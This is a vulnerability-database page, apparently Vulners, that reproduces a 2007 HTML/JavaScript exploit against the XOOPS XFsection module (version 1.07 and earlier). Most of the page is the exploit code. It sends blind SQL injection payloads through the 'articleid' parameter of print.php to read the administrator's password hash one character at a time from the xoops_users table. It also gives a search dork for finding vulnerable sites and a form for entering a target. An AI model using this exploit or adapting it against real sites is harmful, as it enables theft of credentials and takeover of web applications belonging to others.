Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Xoops Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit

🗓️ 04 Apr 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 53 Views

Xoops Module XFsection <= 1.07 articleid BLIND SQL Injection Exploi

Code

                                                &lt;html&gt;
&lt;head&gt;
&lt;title&gt;XOOPS&nbsp;Module&nbsp;XFsection&nbsp;&lt;=&nbsp;1.07&nbsp;(articleid)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit&lt;/title&gt;

&lt;script&nbsp;type=&quot;text/javascript&quot;&gt;

//'===============================================================================================
//'[Script&nbsp;Name:&nbsp;XOOPS&nbsp;Module&nbsp;XFsection&nbsp;&lt;=&nbsp;1.07&nbsp;(articleid)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit
//'[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//'[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//'[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:(
//'[Dork&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;inurl:/modules/xfsection/
//'[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://linux2.ohwada.net/
//'[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Free
//'[Using&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Write&nbsp;Target&nbsp;after&nbsp;Submit&nbsp;Click
//'===============================================================================================


&nbsp;&nbsp;&nbsp;function&nbsp;nesneyarat()&nbsp;{

&nbsp;var&nbsp;nesne;
&nbsp;var&nbsp;tarayici&nbsp;=&nbsp;navigator.appName;

&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(tarayici&nbsp;==&nbsp;&quot;Microsoft&nbsp;Internet&nbsp;Explorer&quot;){
&nbsp;nesne&nbsp;=&nbsp;new&nbsp;ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
&nbsp;nesne&nbsp;=&nbsp;new&nbsp;XMLHttpRequest();

&nbsp;&nbsp;}
return&nbsp;nesne;
}

&nbsp;var&nbsp;http&nbsp;=&nbsp;nesneyarat();



&nbsp;&nbsp;&nbsp;function&nbsp;islemlink(adresyolla,charyolla)&nbsp;{

genreidim=document.getElementById('genreid').value
file=&quot;/modules/xfsection/print.php?articleid=&quot;&nbsp;+&nbsp;genreidim
pathim=document.getElementById('path').value&nbsp;+&nbsp;file
karakterim=document.getElementById('karakter').value&nbsp;+&nbsp;charyolla
adres=document.getElementById('adresim').value&nbsp;+&nbsp;pathim&nbsp;+&nbsp;&nbsp;adresyolla&nbsp;+&nbsp;karakterim


&nbsp;

&nbsp;http.open('get',&nbsp;adres);
&nbsp;http.onreadystatechange&nbsp;=&nbsp;cevapFonksiyonu;
&nbsp;http.send(null);
&nbsp;&nbsp;&nbsp;

}



&nbsp;&nbsp;&nbsp;function&nbsp;cevapFonksiyonu()&nbsp;{
&nbsp;if(http.readyState&nbsp;==&nbsp;4){
document.getElementById('mesaj').value&nbsp;=&nbsp;http.responseText;
yonlendir();

}
}



function&nbsp;yonlendir()&nbsp;{

&nbsp;&nbsp;if&nbsp;(document.getElementById('mesaj').value.indexOf('&lt;span&nbsp;style=&quot;font-size:&nbsp;large;&quot;&gt;',&nbsp;0)&nbsp;==&nbsp;-1)&nbsp;{
&nbsp;alert('False');


&nbsp;&nbsp;}

&nbsp;if&nbsp;(document.getElementById('mesaj').value.indexOf('&lt;span&nbsp;style=&quot;font-size:&nbsp;large;&quot;&gt;',&nbsp;0)&nbsp;!=&nbsp;-1)&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;alert('TRUEEEEEEE');
&nbsp;&nbsp;&nbsp;}
&nbsp;


&nbsp;&nbsp;}

function&nbsp;dal()&nbsp;{

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(0)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(1)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(1)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(2)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(2)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(3)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(3)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(4)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(4)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(5)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(5)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(6)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(6)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(7)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(7)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(8)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(8)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(9)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(9)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(a)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(a)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(b)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(b)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(c)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(c)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(d)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(d)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(e)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(e)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(f)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(f)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Finished&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}



&nbsp;&nbsp;}


&lt;/script&gt;

&nbsp;&nbsp;&nbsp;&lt;/head&gt;

&nbsp;&lt;body&nbsp;bgcolor=&quot;#000000&quot;&gt;

&lt;center&gt;

&lt;p&gt;&lt;b&gt;&lt;font&nbsp;face=&quot;Verdana&quot;&nbsp;size=&quot;2&quot;&nbsp;color=&quot;#008000&quot;&gt;XOOPS&nbsp;Module&nbsp;XFsection&nbsp;&lt;=&nbsp;1.07&nbsp;(articleid)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;Target:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[http://[target]/&lt;/font&gt;&lt;font&nbsp;color=&quot;#00FF00&quot;&nbsp;size=&quot;2&quot;&nbsp;face=&quot;Arial&quot;&gt;
&nbsp;&nbsp;&lt;/font&gt;&lt;font&nbsp;color=&quot;#FF0000&quot;&nbsp;size=&quot;2&quot;&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;adresim&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;http://&quot;&gt;&lt;/p&gt;
&lt;br&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;&amp;nbsp;Path:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[http://[target]/[scriptpath]&amp;nbsp;&amp;nbsp;&amp;nbsp;&nbsp;&lt;/font&gt;&lt;/b&gt;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;path&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;/&quot;&gt;
&nbsp;&nbsp;&lt;p&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;&amp;nbsp;Character:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[Md5&nbsp;
&nbsp;&nbsp;Character&nbsp;1-32]&amp;nbsp;&amp;nbsp;&nbsp;&lt;/font&gt;&lt;/b&gt;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;karakter&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;1&quot;&gt;
&lt;/p&gt;
&nbsp;&nbsp;&lt;p&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;Article&nbsp;Id:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[print.php?articleid=]&amp;nbsp;&amp;nbsp;&nbsp;&lt;/font&gt;&lt;/b&gt;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;genreid&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;1&quot;&gt;
&lt;/p&gt;
&nbsp;&nbsp;&lt;p&gt;&lt;input&nbsp;type=&quot;submit&quot;&nbsp;value=&quot;Test&nbsp;Character(0)&quot;&nbsp;name=&quot;buton&quot;&nbsp;onclick=&quot;dal();&quot;&gt;&lt;/p&gt;
&lt;br&gt;
&lt;textarea&nbsp;name=&quot;mesaj&quot;&nbsp;rows=&quot;1&quot;&nbsp;cols=&quot;20&quot;&nbsp;style=&quot;visibility:hidden&quot;&gt;&lt;/textarea&gt;&nbsp;&lt;br&gt;
&lt;p&gt;

&lt;b&gt;&lt;font&nbsp;face=&quot;Verdana&quot;&nbsp;size=&quot;2&quot;&nbsp;color=&quot;#008000&quot;&gt;ajann&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/p&gt;
&lt;/center&gt;


&nbsp;&lt;/body&gt;
&nbsp;&lt;/html&gt;

&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1
xoops module xfsectionsql injectionexploit
53